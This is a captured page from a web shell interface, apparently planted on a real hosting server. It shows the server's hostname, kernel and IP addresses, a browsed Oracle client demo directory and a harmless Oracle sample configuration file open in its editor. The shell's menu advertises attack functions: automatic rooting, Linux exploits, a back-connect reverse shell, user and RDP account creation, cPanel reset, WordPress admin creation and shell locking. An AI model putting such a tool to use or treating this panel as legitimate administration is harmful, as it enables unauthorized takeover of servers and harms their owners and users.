Linux vps-4302913.novaexata.com.br 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Apache
: 162.214.88.42 | : 216.73.216.156
166 Domain
7.3.33
wwnova
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
oracle /
21 /
client64 /
demo /
[ HOME SHELL ]
Name
Size
Permission
Action
cdemo81.c
17.29
KB
-rw-r--r--
demo.mk
3.73
KB
-rw-r--r--
occidemo.sql
6.21
KB
-rw-r--r--
occidemod.sql
1.35
KB
-rw-r--r--
occidml.cpp
7.47
KB
-rw-r--r--
occiobj.cpp
4.79
KB
-rw-r--r--
occiobj.typ
60
B
-rw-r--r--
oraaccess.xml
1.11
KB
-rw-r--r--
ott
874
B
-rwxr-xr-x
setuporamysql.sh
6.64
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : oraaccess.xml
<?xml version="1.0"?> <!-- Copyright (c) 2013, Oracle and/or its affiliates. All rights reserved. NAME oraaccess.xml DESCRIPTION Here is a sample oraaccess.xml. This shows defaulting of global and connection parameters across all connections. The tags can also be prefixed with "oci:". For example <oci:prefetch> NOTES Configured values are for illustration purposes only and not necessarily recommended MODIFIED (MM/DD/YY) kkverma 09/16/13 - Creation --> <oraaccess xmlns="http://xmlns.oracle.com/oci/oraaccess" xmlns:oci="http://xmlns.oracle.com/oci/oraaccess" schemaLocation="http://xmlns.oracle.com/oci/oraaccess http://xmlns.oracle.com/oci/oraaccess.xsd"> <default_parameters> <prefetch> <rows>50</rows> </prefetch> <statement_cache> <size>100</size> </statement_cache> <result_cache> <max_rset_rows>100</max_rset_rows> <!-- 'K' or 'k' for kilobytes and 'M' or 'm' for megabytes --> <max_rset_size>10K</max_rset_size> <max_size>64M</max_size> </result_cache> </default_parameters> </oraaccess>
Close